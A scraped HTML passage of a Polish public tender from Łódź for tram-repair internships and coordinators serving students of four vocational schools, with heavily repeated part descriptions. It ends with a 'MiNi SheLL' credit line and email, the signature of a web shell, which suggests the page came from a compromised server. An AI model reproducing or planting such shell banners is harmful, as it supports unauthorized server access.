Przewiduje się zorganizowanie staży podzielonych w ten sposób, by w okresie ferii zimowych (zgodnie z terminami wyznaczonymi przez MEN dla woj. łódzkiego) każda z grup uczestniczyła w stażu w łącznej ilości 70 godzin, oraz poza okresem ferii zimowych, aby każda grupa odbyła łącznie 16 dni stażu po 5 godzin jednorazowo (raz w tygodniu) dla każdej z grup.
Staże: Zamawiający dokona podziału uczniów na 4 grupy po 5 uczniów w taki sposób że:
Część 6 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 7 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 8 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 9 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie praktyk zawodowych 
w zakładzie pracy lub przedsiębiorstwie zajmującym się, w zakresie prowadzonej działalności gospodarczej, naprawą i eksploatacją pojazdów tramwajowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polega na zorganizowaniu warunków i możliwości do przeprowadzenia oraz przeprowadzeniu praktyk zawodowych dla uczniów klas technikum i zasadniczej szkoły zawodowej Zespołu Szkół Ponadgimnazjalnych nr 7 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 9 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 22 
w Łodzi oraz Zespołu Szkół Technicznych nr 1 w Łodzi. 
Projekt przewiduje zorganizowanie łącznie 400 godzin praktyk (łącznie dla części 3, 4 i 5), prowadzonych przez specjalistów i instruktorów praktycznej nauki zawodu 
w zakresie specyfiki pracy przy naprawie i eksploatacji pojazdów tramwajowych. 
W trakcie praktyk uczniowie mają za zadanie asystować przy pracy w zakresie eksploatacji i naprawy taboru tramwajowego.
Przewiduje się zorganizowanie praktyk w taki sposób, aby każda grupa odbyła łącznie 16 dni praktyk po 5 godzin dydaktycznych jednorazowo (raz w tygodniu) dla każdej z grup.
Praktyki: Zamawiający dokona podziału uczniów na 6 grup po maksymalnie 10 uczniów w taki sposób że:
Część 3 - 2 grupy po 10 uczniów, łącznie 160 godzin dydaktycznych/dwie grupy
Cześć 4 - 2 grupy po 10 uczniów, łącznie 160 godzin dydaktycznych/dwie grupy
Cześć 5 - 1 grupy po 10 uczniów, łącznie 80 godzin dydaktycznych/dwie grupy
Część 6, 7, 8 i 9: Zorganizowanie i przeprowadzenie staży w zakładzie pracy lub przedsiębiorstwie zajmującym się, w zakresie prowadzonej działalności gospodarczej, naprawą i eksploatacją pojazdów tramwajowych.
Usługa polega na zorganizowaniu warunków i możliwości do przeprowadzenia oraz przeprowadzeniu staży dla uczniów klas technikum i zasadniczej szkoły zawodowej Zespołu Szkół Ponadgimnazjalnych nr 7 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 9 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 22 w Łodzi oraz Zespołu Szkół Technicznych nr 1 w Łodzi. 
Projekt przewiduje zorganizowanie łącznie 150 godzin staży dla 4 grup (części 6, 7, 8 i 9), prowadzonych przez specjalistów i instruktorów praktycznej nauki zawodu w zakresie specyfiki pracy przy naprawie i eksploatacji pojazdów tramwajowych. W trakcie staży uczniowie mają zostać włączeni w bieżący proces produkcyjny z zakresu eksploatacji i naprawy taboru tramwajowego.
Przewiduje się zorganizowanie staży podzielonych w ten sposób, by w okresie ferii zimowych (zgodnie z terminami wyznaczonymi przez MEN dla woj. łódzkiego) każda z grup uczestniczyła w stażu w łącznej ilości 70 godzin, oraz poza okresem ferii zimowych, aby każda grupa odbyła łącznie 16 dni stażu po 5 godzin jednorazowo (raz w tygodniu) dla każdej z grup.
Staże: Zamawiający dokona podziału uczniów na 4 grupy po 5 uczniów w taki sposób że:
Część 6 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 7 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 8 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 9 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie praktyk zawodowych 
w zakładzie pracy lub przedsiębiorstwie zajmującym się, w zakresie prowadzonej działalności gospodarczej, naprawą i eksploatacją pojazdów tramwajowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polega na zorganizowaniu warunków i możliwości do przeprowadzenia oraz przeprowadzeniu praktyk zawodowych dla uczniów klas technikum i zasadniczej szkoły zawodowej Zespołu Szkół Ponadgimnazjalnych nr 7 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 9 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 22 
w Łodzi oraz Zespołu Szkół Technicznych nr 1 w Łodzi. 
Projekt przewiduje zorganizowanie łącznie 400 godzin praktyk (łącznie dla części 3, 4 i 5), prowadzonych przez specjalistów i instruktorów praktycznej nauki zawodu 
w zakresie specyfiki pracy przy naprawie i eksploatacji pojazdów tramwajowych. 
W trakcie praktyk uczniowie mają za zadanie asystować przy pracy w zakresie eksploatacji i naprawy taboru tramwajowego.
Przewiduje się zorganizowanie praktyk w taki sposób, aby każda grupa odbyła łącznie 16 dni praktyk po 5 godzin dydaktycznych jednorazowo (raz w tygodniu) dla każdej z grup.
Praktyki: Zamawiający dokona podziału uczniów na 6 grup po maksymalnie 10 uczniów w taki sposób że:
Część 3 - 2 grupy po 10 uczniów, łącznie 160 godzin dydaktycznych/dwie grupy
Cześć 4 - 2 grupy po 10 uczniów, łącznie 160 godzin dydaktycznych/dwie grupy
Cześć 5 - 1 grupy po 10 uczniów, łącznie 80 godzin dydaktycznych/dwie grupy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie staży w zakładzie pracy lub przedsiębiorstwie zajmującym się, w zakresie prowadzonej działalności gospodarczej, naprawą i eksploatacją pojazdów tramwajowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polega na zorganizowaniu warunków i możliwości do przeprowadzenia oraz przeprowadzeniu staży dla uczniów klas technikum i zasadniczej szkoły zawodowej Zespołu Szkół Ponadgimnazjalnych nr 7 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 9 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 22 w Łodzi oraz Zespołu Szkół Technicznych nr 1 w Łodzi. 
Projekt przewiduje zorganizowanie łącznie 150 godzin staży dla 4 grup (części 6, 7, 8 i 9), prowadzonych przez specjalistów i instruktorów praktycznej nauki zawodu w zakresie specyfiki pracy przy naprawie i eksploatacji pojazdów tramwajowych. W trakcie staży uczniowie mają zostać włączeni w bieżący proces produkcyjny z zakresu eksploatacji i naprawy taboru tramwajowego.
Przewiduje się zorganizowanie staży podzielonych w ten sposób, by w okresie ferii zimowych (zgodnie z terminami wyznaczonymi przez MEN dla woj. łódzkiego) każda z grup uczestniczyła w stażu w łącznej ilości 70 godzin, oraz poza okresem ferii zimowych, aby każda grupa odbyła łącznie 16 dni stażu po 5 godzin jednorazowo (raz w tygodniu) dla każdej z grup.
Staże: Zamawiający dokona podziału uczniów na 4 grupy po 5 uczniów w taki sposób że:
Część 6 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 7 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 8 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 9 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie staży w zakładzie pracy lub przedsiębiorstwie zajmującym się, w zakresie prowadzonej działalności gospodarczej, naprawą i eksploatacją pojazdów tramwajowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polega na zorganizowaniu warunków i możliwości do przeprowadzenia oraz przeprowadzeniu staży dla uczniów klas technikum i zasadniczej szkoły zawodowej Zespołu Szkół Ponadgimnazjalnych nr 7 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 9 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 22 w Łodzi oraz Zespołu Szkół Technicznych nr 1 w Łodzi. 
Projekt przewiduje zorganizowanie łącznie 150 godzin staży dla 4 grup (części 6, 7, 8 i 9), prowadzonych przez specjalistów i instruktorów praktycznej nauki zawodu w zakresie specyfiki pracy przy naprawie i eksploatacji pojazdów tramwajowych. W trakcie staży uczniowie mają zostać włączeni w bieżący proces produkcyjny z zakresu eksploatacji i naprawy taboru tramwajowego.
Przewiduje się zorganizowanie staży podzielonych w ten sposób, by w okresie ferii zimowych (zgodnie z terminami wyznaczonymi przez MEN dla woj. łódzkiego) każda z grup uczestniczyła w stażu w łącznej ilości 70 godzin, oraz poza okresem ferii zimowych, aby każda grupa odbyła łącznie 16 dni stażu po 5 godzin jednorazowo (raz w tygodniu) dla każdej z grup.
Staże: Zamawiający dokona podziału uczniów na 4 grupy po 5 uczniów w taki sposób że:
Część 6 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 7 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 8 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 9 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie staży w zakładzie pracy lub przedsiębiorstwie zajmującym się, w zakresie prowadzonej działalności gospodarczej, naprawą i eksploatacją pojazdów tramwajowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polega na zorganizowaniu warunków i możliwości do przeprowadzenia oraz przeprowadzeniu staży dla uczniów klas technikum i zasadniczej szkoły zawodowej Zespołu Szkół Ponadgimnazjalnych nr 7 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 9 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 22 w Łodzi oraz Zespołu Szkół Technicznych nr 1 w Łodzi. 
Projekt przewiduje zorganizowanie łącznie 150 godzin staży dla 4 grup (części 6, 7, 8 i 9), prowadzonych przez specjalistów i instruktorów praktycznej nauki zawodu w zakresie specyfiki pracy przy naprawie i eksploatacji pojazdów tramwajowych. W trakcie staży uczniowie mają zostać włączeni w bieżący proces produkcyjny z zakresu eksploatacji i naprawy taboru tramwajowego.
Przewiduje się zorganizowanie staży podzielonych w ten sposób, by w okresie ferii zimowych (zgodnie z terminami wyznaczonymi przez MEN dla woj. łódzkiego) każda z grup uczestniczyła w stażu w łącznej ilości 70 godzin, oraz poza okresem ferii zimowych, aby każda grupa odbyła łącznie 16 dni stażu po 5 godzin jednorazowo (raz w tygodniu) dla każdej z grup.
Staże: Zamawiający dokona podziału uczniów na 4 grupy po 5 uczniów w taki sposób że:
Część 6 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 7 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 8 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 9 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie staży w zakładzie pracy lub przedsiębiorstwie zajmującym się, w zakresie prowadzonej działalności gospodarczej, naprawą i eksploatacją pojazdów tramwajowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polega na zorganizowaniu warunków i możliwości do przeprowadzenia oraz przeprowadzeniu staży dla uczniów klas technikum i zasadniczej szkoły zawodowej Zespołu Szkół Ponadgimnazjalnych nr 7 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 9 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 22 w Łodzi oraz Zespołu Szkół Technicznych nr 1 w Łodzi. 
Projekt przewiduje zorganizowanie łącznie 150 godzin staży dla 4 grup (części 6, 7, 8 i 9), prowadzonych przez specjalistów i instruktorów praktycznej nauki zawodu w zakresie specyfiki pracy przy naprawie i eksploatacji pojazdów tramwajowych. W trakcie staży uczniowie mają zostać włączeni w bieżący proces produkcyjny z zakresu eksploatacji i naprawy taboru tramwajowego.
Przewiduje się zorganizowanie staży podzielonych w ten sposób, by w okresie ferii zimowych (zgodnie z terminami wyznaczonymi przez MEN dla woj. łódzkiego) każda z grup uczestniczyła w stażu w łącznej ilości 70 godzin, oraz poza okresem ferii zimowych, aby każda grupa odbyła łącznie 16 dni stażu po 5 godzin jednorazowo (raz w tygodniu) dla każdej z grup.
Staże: Zamawiający dokona podziału uczniów na 4 grupy po 5 uczniów w taki sposób że:
Część 6 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 7 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 8 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych
Cześć 9 - 1 grupa po 5 uczniów, łącznie 150 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pełnienie funkcji Szkolnych Koordynatorów Zajęć 
i Praktyk/staży..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Osoby wyznaczone do realizacji części 10 i 11 będą odpowiedzialne za pełnienie funkcji koordynatorów usług o których mowa odpowiednio w częściach 1-9 zamówienia.  
Do obowiązków Koordynatorów Zajęć i Praktyk/staży w szczególności należy:
a) opracowanie harmonogramów terminów odbywania się szkoleń, praktyk i staży w porozumieniu z Zamawiającym oraz Dyrekcją Szkół.
b) dokonanie podziału na grupy uczniów uczestniczących w poszczególnych zadaniach oraz sporządzenie dokumentu - imiennej listy uczestników oraz przekazanie go do akceptacji Zamawiającego przed przystąpieniem do wykonywania usług przez Wykonawców części od 1 do 9. 
c) uczestnictwo w procesie monitoringu i ewaluacji części 1-9, we współpracy z Zamawiającym.
d) prowadzenie kart czasu pracy koordynatora zgodnie z wzorem dostarczonym przez Zamawiającego oraz do prowadzenia dzienników zajęć.  
Zamawiający wymaga, by osoby realizujące usługę (koordynatorzy) przestrzegały wytycznych w zakresie kwalifikowania wydatków w ramach POKL, co oznacza, że takie osoby nie mogą świadczyć pracy (rozliczyć roboczogodzin) w ilości przekraczającej 240 godzin w miesiącu (dotyczy to zarówno umów cywilnoprawnych, jak i umów o pracę). 
Projekt zakłada zaangażowanie koordynatorów przez cały okres trwania Projektu tj. w okresie październik 2014 r. - czerwiec 2015 r. przy zaangażowaniu miesięcznym nie przekraczającym 50 godzin dla jednego koordynatora.
Do realizacji zadania może zostać wyznaczona jedynie osoba posiadająca stosowne wykształcenie i umiejętności o których mowa w Dziale VI ust. 6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część 10 i 11: Pełnienie funkcji Szkolnych Koordynatorów Zajęć 
i Praktyk/staży..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Osoby wyznaczone do realizacji części 10 i 11 będą odpowiedzialne za pełnienie funkcji koordynatorów usług o których mowa odpowiednio w częściach 1-9 zamówienia.  
Do obowiązków Koordynatorów Zajęć i Praktyk/staży w szczególności należy:
a) opracowanie harmonogramów terminów odbywania się szkoleń, praktyk i staży w porozumieniu z Zamawiającym oraz Dyrekcją Szkół.
b) dokonanie podziału na grupy uczniów uczestniczących w poszczególnych zadaniach oraz sporządzenie dokumentu - imiennej listy uczestników oraz przekazanie go do akceptacji Zamawiającego przed przystąpieniem do wykonywania usług przez Wykonawców części od 1 do 9. 
c) uczestnictwo w procesie monitoringu i ewaluacji części 1-9, we współpracy z Zamawiającym.
d) prowadzenie kart czasu pracy koordynatora zgodnie z wzorem dostarczonym przez Zamawiającego oraz do prowadzenia dzienników zajęć.  
Zamawiający wymaga, by osoby realizujące usługę (koordynatorzy) przestrzegały wytycznych w zakresie kwalifikowania wydatków w ramach POKL, co oznacza, że takie osoby nie mogą świadczyć pracy (rozliczyć roboczogodzin) w ilości przekraczającej 240 godzin w miesiącu (dotyczy to zarówno umów cywilnoprawnych, jak i umów o pracę). 
Projekt zakłada zaangażowanie koordynatorów przez cały okres trwania Projektu tj. w okresie październik 2014 r. - czerwiec 2015 r. przy zaangażowaniu miesięcznym nie przekraczającym 50 godzin dla jednego koordynatora.
Do realizacji zadania może zostać wyznaczona jedynie osoba posiadająca stosowne wykształcenie i umiejętności o których mowa w Dziale VI ust. 6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com